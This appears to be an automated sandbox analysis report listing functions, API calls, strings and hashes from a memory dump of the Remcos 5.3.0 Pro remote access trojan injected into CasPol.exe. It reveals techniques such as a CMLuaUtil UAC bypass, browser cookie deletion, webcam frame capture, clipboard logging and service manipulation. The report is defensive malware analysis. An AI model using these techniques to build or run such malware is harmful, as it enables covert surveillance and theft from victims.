ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
PathFileExistsA.SHLWAPI(?), ref: 0040B779

Strings

Cookies, xrefs: 0040B6FE
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040B703
[IE cookies not found], xrefs: 0040B741
[IE cookies cleared!], xrefs: 0040B7C6, 0040B7E6

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
Opcode Fuzzy Hash: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE

Function 00455913 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
Opcode Fuzzy Hash: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669

Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
int.LIBCPMT ref: 0040FC0F

Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B

std::_Facet_Register.LIBCPMT ref: 0040FC4B
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D

Strings

p[G, xrefs: 0040FC94

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: p[G
API String ID: 2536120697-440918510
Opcode ID: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
Opcode Fuzzy Hash: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D

Function 0041A52B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
InternetCloseHandle.WININET(00000000), ref: 0041A5C3
InternetCloseHandle.WININET(00000000), ref: 0041A5C6

Strings

http://geoplugin.net/json.gp, xrefs: 0041A55E

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
Opcode Fuzzy Hash: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA

Function 0044FCEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B

_free.LIBCMT ref: 0044FD39

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 0044FD44
_free.LIBCMT ref: 0044FD4F
_free.LIBCMT ref: 0044FDA3
_free.LIBCMT ref: 0044FDAE
_free.LIBCMT ref: 0044FDB9
_free.LIBCMT ref: 0044FDC4

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655

Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835

Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9

CoUninitialize.OLE32 ref: 0040688E

Strings

[+] before ShellExec, xrefs: 00406856
[+] ShellExec success, xrefs: 00406873
[+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 00406815, 00406818, 0040686A

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-2637227304
Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669

Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
int.LIBCPMT ref: 0040FEF2

Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B

std::_Facet_Register.LIBCPMT ref: 0040FF2E
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70

Strings

h]G, xrefs: 0040FEEA

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: h]G
API String ID: 2536120697-1579725984
Opcode ID: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
Opcode Fuzzy Hash: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789

Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
GetLastError.KERNEL32 ref: 0040B2EE

Strings

\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
UserProfile, xrefs: 0040B2B4
[Chrome Cookies found, cleared!], xrefs: 0040B314
[Chrome Cookies not found], xrefs: 0040B308

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
Opcode Fuzzy Hash: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE

Function 0041BEC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00474358), ref: 0041BEC9
ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07

Strings

Remcos v, xrefs: 0041BF22
5.3.0 Pro, xrefs: 0041BF30
CONOUT$, xrefs: 0041BEF5

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Console$AllocOutputShowWindow
String ID: Remcos v$5.3.0 Pro$CONOUT$
API String ID: 2425139147-2527699604
Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D

Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON

Download Yara Rule

Strings

BG, xrefs: 00406909
(CG, xrefs: 0040693F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 00406927

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
API String ID: 0-3292752334
Opcode ID: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
Opcode Fuzzy Hash: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C

Function 00419F42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
Sleep.KERNEL32(00002710), ref: 00419F89
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92

Strings

`#v, xrefs: 00419F74
Alarm triggered, xrefs: 00419F4B

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered$`#v
API String ID: 614609389-3049340936
Opcode ID: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
Opcode Fuzzy Hash: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB

Function 0043960C Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00439799
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
__allrem.LIBCMT ref: 004397CC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
__allrem.LIBCMT ref: 00439801
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758

Function 00444B4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00444B79
__cftoe.LIBCMT ref: 00444BAB

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D

Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00403E8A

Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2

Strings

CloseCamera, xrefs: 00403F54
P>G, xrefs: 00403FAC
GetFrame, xrefs: 00403F65
FreeFrame, xrefs: 00403F76
OpenCamera, xrefs: 00403F48

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
API String ID: 3469354165-462540288
Opcode ID: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
Opcode Fuzzy Hash: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF

Function 00419DFC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9

Function 00437E16 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C

Function 00446ECF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
_free.LIBCMT ref: 00446F06
_free.LIBCMT ref: 00446F2E
SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
_abort.LIBCMT ref: 00446F4D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F

Function 00419C30 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5

Function 00419D32 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9

Function 00419D97 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8

Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED

Strings

[regsplt], xrefs: 00412B85
DG, xrefs: 00412B2F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$DG
API String ID: 3554306468-1089238109
Opcode ID: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
Opcode Fuzzy Hash: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A

Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571

Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB

__Init_thread_footer.LIBCMT ref: 0040AEA7

Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C

Strings

P]G, xrefs: 0040AE70
[End of clipboard], xrefs: 0040AEE9
[Text copied to clipboard], xrefs: 0040AEF6
L]G, xrefs: 0040AE80

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
API String ID: 2974294136-4018440003
